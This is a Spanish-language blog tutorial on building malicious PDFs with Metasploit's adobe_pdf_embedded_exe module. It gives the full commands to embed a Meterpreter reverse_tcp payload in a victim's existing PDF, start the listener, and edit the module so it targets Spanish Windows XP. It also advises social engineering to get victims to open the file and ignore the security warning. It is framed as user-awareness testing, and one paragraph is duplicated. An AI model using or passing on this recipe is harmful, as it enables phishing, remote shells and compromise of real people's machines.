Leyendo el blog de F-Secure, me encontré con un post sobre PDF maliciosos que estaban siendo utilizados para ataques de espionaje. Al ser abiertos, dropeaban y corrían un archivo ejecutable, en este caso un Poison Ivy que luego se conectaba a una IP de Singapore.
MetaSploit: adobe_pdf_embedded_exe
Para testear el comportamiento de nuestros usuarios, ante una amenaza similar a esta, podemos replicar este ataque con el módulo “adobe_pdf_embedded_exe” de MetaSploit, en donde vamos a embeber un archivo ejecutable “.exe”, o un payload de MetaSploit, dentro de un archivo PDF.
Por supuesto vamos a necesitar realizar un poco de ingeniería social, primero para que la víctima abra el PDF que le enviamos, y luego, para que ignore el warning de seguridad que aparecerá cuando se intente ejecutar el payload malicioso.
Lo interesante del módulo “adobe_pdf_embedded_exe”, es que nos permitirá embeber el payload en cualquier PDF existente, lo que nos allanará el camino para realizar la ingeniería social. Por ejemplo, podríamos buscar PDF’s existentes de una víctima en particular en Google:
Embebiendo un Payload de MetaSploit en un PDF
Para embeber un payload, simplemente lo configuramos como a cualquier otro exploit, solamente debemos tener en cuenta que en la opción “INFILENAME” vamos a poner el path al archivo PDF que queremos utilizar, y en la opción “FILENAME”, el nombre del nuevo archivo PDF con el payload embebido:
Luego deberemos dejar escuchando por la conexión reversa que se va a generar una vez que la víctima abra el PDF:
use windows/fileformat/adobe_pdf_embedded_exe set INFILENAME /tmp/programa.pdf set FILENAME evil.pdf set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.102 exploit
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.102 E
Cuando la víctima abra el archivo PDF, verá un warning:
Al momento de presion “Open”, el payload será dropeado en el sistema, y un script intentará correrlo. Como el target de este módulo es Windows XP SP3 English, vemos en el warning que el payload es buscado dentro de “Desktop”, “My Documents” y “Documents”.
Para que funcione con un XP en español, debemos agregar en el código del módulo, los directorios “Escritorio” y “Mis Documentos”, y volver a generar el PDF:
# editamos el módulo: /framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb # reemplazamos la siguiente línea: dirs = [ "Desktop", "My Documents", "Documents" ] # por la siguiente línea: dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]
Ahora si, se ejecutará el payload, y como podemos ver, lo hicimos con un Windows XP SP2 en Español:
Si vimos atentamente el warning, pudimos apreciar que al ejecutar el payload dropeado, lo hace de esta forma: “start programa.pdf”.
El archivo que enviamos a la víctima se llamaba “evil.pdf”, cuando dropeo el payload lo hizo con el nombre “programa.pdf”, como el nombre del PDF verdadero que configuramos oportunamente. En realidad, “programa.pdf” es un archivo “.exe”, con el payload de Meterpreter, pero como el comando “start” puede correr un ejecutable, sin importar la extensión que posea, esta hecho de esta forma para que el ataque pase un poco más desapercibido.
El archivo que enviamos a la víctima se llamaba “evil.pdf”, cuando dropeo el payload lo hizo con el nombre “programa.pdf”, como el nombre del PDF verdadero que configuramos oportunamente. En realidad, “programa.pdf” es un archivo “.exe”, con el payload de Meterpreter, pero como el comando “start” puede correr un ejecutable, sin importar la extensión que posea, esta hecho de esta forma para que el ataque pase un poco más desapercibido.
Embebiendo un Ejecutable en un PDF
Para embeber un archivo ejecutable dentro de nuestro PDF, simplemente configuramos la opción “EXENAME”. En este caso estamos embebiendo la famosa calculadora de Windows “calc.exe”:
set EXENAME /tmp/calc.exe set INFILENAME /tmp/programa.pdf exploit
Si bien el PAYLOAD no debería ser necesario configurarlo, ya que no estamos embebiendo un payload sino el ejecutable “calc.exe”, por alguna razón si no lo configuramos no nos deja seguir.
set PAYLOAD windows/shell/bind_tcp
Cuando la víctima abra el archivo PDF, verá el warning pero ya con los directorios que agregamos:
Una vez que la víctima presione “Open”, se correrá el archivo ejecutable que embebimos, el famoso “calc.exe”:
Eso es todo amigos espero y hayan entendido, de lo contrario Posteenlo aqui mismo xD
0 comentarios:
Publicar un comentario
Dejanos un Comentario, apoyanos para seguir ayudandote